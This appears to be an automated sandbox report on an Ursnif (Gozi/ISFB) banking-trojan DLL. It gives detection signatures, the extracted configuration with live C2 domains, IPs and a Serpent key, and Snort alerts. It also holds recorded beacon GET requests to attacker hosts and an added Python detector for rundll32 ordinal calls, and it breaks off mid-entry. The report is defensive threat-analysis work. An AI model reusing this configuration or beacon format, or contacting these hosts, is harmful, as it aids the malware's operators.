Windows Analysis Report
hFGZpat9Mf.dll

Overview

General Information

  • Sample Name: hFGZpat9Mf.dll
  • Analysis ID: 560543
  • MD5: 9acde2c3e3a375590a1bc716eabc52c5
  • SHA1: e231c9ae802a9aad9916f08256f7558f531d54ce
  • SHA256: 57f997217db22a4d97700768189d44034303e3b15dc08fa48ed6b91bd7051c05
  • Tags: dll, Gozi, ISFB, Ursnif

Detection

  • Family: Ursnif
  • Score: 100 (range 0 - 100)
  • Whitelisted: false
  • Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Sigma detected: Suspicious Call by Ordinal
Writes registry values via WMI
Contains functionality to detect sleep reduction / modifications
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Contains functionality to record screenshots
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 988 cmdline: loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 5904 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 3272 cmdline: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 4496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
Extracted malware configuration (Ursnif):

{
  "RSA Public Key": "a/OOe3vutyE+gNUF58s+932DNMr8fczoarMUDWqkJsUgObu+3KDuWCwO4VJi2nQNFoXQ13xL3U4zAT7teC979D2YSjTERxwWBeeP0HeZqNq0qcAgYIwsDRVFhGgIWRlndn894LdhC+W8uyATPg1or5n2yZWlh+/NEBJX1nFopQ/z09NIGZPpSgelgd7Gl3dRww5rEsR2WK4eL7TmnaoLNu6StWcVsJ2/hdx1IvAw+0FHXO2OQVeCIyD0YqFOgVX4yIlMXSNJExST4L1Wc5wBukAkkdIxFsm7gsamW82tEhFe2W5TqQV7VVRxRARRhHVoEwzsqj+Q49089Kkixnoy1HXPNrN04rhNhyDNba5DkKY=",
  "c2_domain": [
    "config.edge.skype.com",
    "194.76.226.200",
    "giporedtrip.at",
    "habpfans.at",
    "31.214.157.187"
  ],
  "botnet": "3000",
  "server": "50",
  "serpent_key": "YFyLBjaJo8V90gKm",
  "sleep_time": "1",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0"
}
Yara matches in memory dumps (19 entries in the full report; the first five are listed here):

  Source (memory dump)                                                                    Rule                  Description           Author
  00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp   JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
  00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp   JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
Yara matches in unpacked PE files (14 entries in the full report; the first five are listed here):

  Source (unpacked PE)                    Rule                  Description           Author
  3.2.rundll32.exe.ee0000.2.raw.unpack    JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  3.0.rundll32.exe.ee0000.6.raw.unpack    JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  3.2.rundll32.exe.1080000.3.unpack       JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  3.0.rundll32.exe.1080000.3.raw.unpack   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
  0.2.loaddll32.exe.9e0000.3.unpack       JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security

System Summary

Sigma: Suspicious Call by Ordinal (author: Florian Roth)
  Event: Process started
  Command: rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
  Image: C:\Windows\SysWOW64\rundll32.exe (PID 3272)
  OriginalFileName: C:\Windows\SysWOW64\rundll32.exe
  ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
  ParentImage: C:\Windows\SysWOW64\cmd.exe (PID 5904)
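The Sigma hit above is the one event in this process tree that a fleet-wide detection can key on: rundll32.exe invoking an export by ordinal (",#1") from a DLL sitting on a user's Desktop. The Python below is an added example, not part of the Joe Sandbox report and not a reproduction of the Sigma rule it cites; it applies that logic to constructed process-creation events, the first of which mirrors the report's rundll32 process. The allow-list entry and the list of user-writable directories are this example's assumptions.

```python
"""Flag rundll32 exports called by ordinal, as in this report's process tree.

Added example; not part of the Joe Sandbox report and not a copy of the
Sigma rule "Suspicious Call by Ordinal".  The events are constructed:
the first reproduces the report's rundll32 process, the others are
controls.  ALLOW_LIST and USER_WRITABLE are this example's assumptions.
"""
import re

# rundll32 <dll>,#<ordinal>  (quotes around the DLL path are optional)
ORDINAL_CALL = re.compile(
    r'rundll32(?:\.exe)?\s+"?(?P<dll>[^",]+?)"?\s*,\s*#(?P<ordinal>\d+)\b',
    re.IGNORECASE)

# Directories an unprivileged user can write to.  A DLL loaded by ordinal
# from one of these deserves more attention than one under System32.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(?:Desktop|Downloads|Documents|AppData|Pictures)\\"
    r"|\\ProgramData\\|\\Temp\\",
    re.IGNORECASE)

# Assumed benign ordinal calls: (lower-cased DLL file name, ordinal).
ALLOW_LIST = {("edgehtml.dll", 141)}


def assess(event):
    """Return a finding dict for a process-creation event, or None.

    event: {"Image": ..., "CommandLine": ..., "ParentImage": ...}
    """
    if not event["Image"].lower().endswith("\\rundll32.exe"):
        return None
    m = ORDINAL_CALL.search(event["CommandLine"])
    if m is None:
        return None                      # named export, or no DLL argument
    dll = m.group("dll").strip()
    ordinal = int(m.group("ordinal"))
    name = dll.rsplit("\\", 1)[-1].lower()
    if (name, ordinal) in ALLOW_LIST:
        return None
    return {
        "dll": dll,
        "ordinal": ordinal,
        "user_writable": bool(USER_WRITABLE.search(dll)),
        "parent": event["ParentImage"].rsplit("\\", 1)[-1].lower(),
    }


# Constructed events; the first reproduces the report's rundll32 process.
EVENTS = [
    {"Image": r"C:\Windows\SysWOW64\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1',
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe"},
    # Control: export called by name, not by ordinal.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL",
     "ParentImage": r"C:\Windows\explorer.exe"},
    # Control: ordinal call that the (assumed) allow-list covers.
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe "C:\Windows\System32\EDGEHTML.dll",#141',
     "ParentImage": r"C:\Windows\explorer.exe"},
]


def findings(events=EVENTS):
    """Run assess over a list of events and keep the hits, in order."""
    return [f for f in (assess(e) for e in events) if f]


if __name__ == "__main__":
    for f in findings():
        print(f)
```

Note that loaddll32.exe and the cmd.exe hop above it are Joe Sandbox's own harness for executing a submitted DLL; in real telemetry the parent of rundll32.exe would be whatever dropper or document loaded the DLL, so key on the ordinal call and the DLL location rather than on this parent chain.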


                      AV Detection

Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Ursnif (the configuration listed under the process tree above: botnet 3000, server 50, five c2_domain entries, Serpent key YFyLBjaJo8V90gKm)
Source: hFGZpat9Mf.dll | Virustotal: Detection: 20%
Source: hFGZpat9Mf.dll | ReversingLabs: Detection: 32%
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk | Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/ | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/w | Avira URL Cloud: Label: malware
Source: http://giporedtrip.at/drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk | Avira URL Cloud: Label: malware
Source: http://habpfans.at/drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/ | Avira URL Cloud: Label: malware
Source: http://habpfans.at/g | Avira URL Cloud: Label: malware
Source: giporedtrip.at | Virustotal: Detection: 11%
Source: habpfans.at | Virustotal: Detection: 11%
Source: hFGZpat9Mf.dll | Joe Sandbox ML: detected
Source: 3.0.rundll32.exe.1080000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.890184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.5.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.0.rundll32.exe.ed0184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: 3.2.rundll32.exe.1080000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.9e0000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.0.rundll32.exe.1080000.7.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 3.2.rundll32.exe.ed0184.1.unpack | Avira: Label: TR/Kazy.4159236
Source: hFGZpat9Mf.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WerFault.exe, 00000007.00000003.261009852.0000000004A6B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdbl source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb` source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdbv source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: version.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wsspicli.pdbj source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000007.00000003.275998905.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: powrprof.pdbr source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000007.00000003.275895747.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: comctl32v582.pdbg source: WerFault.exe, 00000007.00000003.276007281.0000000004DD7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function 0_2_007053C4: GetModuleHandleA, GetProcAddress, lstrcpyn, lstrcpyn, lstrcpyn, FindFirstFileA, FindClose, lstrlen, lstrcpyn, lstrlen, lstrcpyn
Source: C:\Windows\SysWOW64\rundll32.exe | Code function 3_2_00E153C4: GetModuleHandleA, GetProcAddress, lstrcpyn, lstrcpyn, lstrcpyn, FindFirstFileA, FindClose, lstrlen, lstrcpyn, lstrlen, lstrcpyn

                      Networking

Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49753 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49758 -> 194.76.226.200:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49771 -> 211.119.84.112:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49781 -> 41.41.255.235:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49812 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49814 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49825 -> 181.129.180.251:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49827 -> 61.36.14.230:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49828 -> 31.214.157.187:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.5:49829 -> 13.107.43.16:80
Source: Joe Sandbox View | ASN Name: EPMTelecomunicacionesSAESPCO
Source: Joe Sandbox View | ASN Name: TE-ASTE-ASEG
Source: Joe Sandbox View | IP Address: 181.129.180.251
Source: global traffic | HTTP traffic detected:
  GET /drew/ozC7eSUmzahvYkYKrp/EnTXsLZQu/ZxwfzvyOea6Ms_2FcWiK/QVPuXmRecwMBmPtS2pP/K1YuqB0TTP3PJ7dc3csdFA/1Ac_2BGJ3ahfL/ClNkrX58/ZDofYbeDbIVvrUisO8PwbQv/pc3vAH6GWF/x_2B4_2BbH_2B0wxz/YCHkmZmDbaCX/aMf9JRtYupc/_2Ben2gyoQcqJb/gP1jDokjfsnRCuX4LwXIc/R6CnFb_2FUwS1dKT/G7Z9QUvFXshW5HS/y.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 194.76.226.200
Source: global traffic | HTTP traffic detected:
  GET /drew/CNAO_2FMqt2bQnnFTS9A/gZCx4lwGHYQjpKz_2Bo/eC3Q_2B6RQnBEorg_2FJk6/uEN67LHG_2FS5/_2BBd1X9/aVPauq0optO45rzbpdCQm0T/aYIRRNsEBo/KjgLaOYvR_2BgwzfQ/25S5OlQYXnss/XWKrlvnyLdL/zvJbW2nKGtMp_2/BhAqVJaOXmJzkoWYA4_2B/1sUQfL4pghiYPQ_2/Bk4zNXCpOm9uy6W/_2FwvvWoJCQywtXfuj/zSz8jbk7z4_2FaKsy/ujc.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: giporedtrip.at
Source: global traffic | HTTP traffic detected:
  GET /drew/5tHE_2Fl/pXBoYLIb7sXj6_2FbgEdP7S/1g8RiyhGmo/7FzHWL9Gm5Pao_2Bw/5oh73gE4juwn/wLkUkA7sRnm/cso3yuTSujNtgI/CMmvYVa7e4KaoltzEmBTc/sgUl10rzE9jSORq1/rqqMvEmtzS52b3S/MwqSqUIn0qJ41lN07l/ltNVceIDT/qjCtCMmp_2FbkkqAoDDI/2nZPBTOmmpjaMrj1ust/QMCPjE0wKPGXBQrFS0WE_2/B3SVbiens/K.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: habpfans.at
Source: global traffic | HTTP traffic detected:
  GET /drew/n9Q8SXORQfxecr/MW5_2Fu9_2Bgocr6670ju/D1JJTVEHrWL1TxqL/xGoJ_2FQlD36_2B/GkPBzrjzE3l7JBLY9O/1EFPlHsMW/m5HxfuFe9CAmeE3Sv9mV/WruJ_2B6bq6RWMaARg5/48WJvcYD9cWVaImnFjKYnp/qqfI438hlaFuV/Cz10Llo3/y28DCtREPMb5OZnUZKj2hAx/fvbD6E0k2X/xMHWSCI5symguz2Bp/FnCO_2F0QOq8/vwhEVJIxW/5.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 31.214.157.187
Source: global traffic | HTTP traffic detected:
  GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: 194.76.226.200
Source: global traffic | HTTP traffic detected:
  GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: giporedtrip.at
Source: global traffic | HTTP traffic detected:
  GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1
  Cache-Control: no-cache
  Connection: Keep-Alive
  Pragma: no-cache
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Host: habpfans.at
Source: global traffic | HTTP traffic detected:
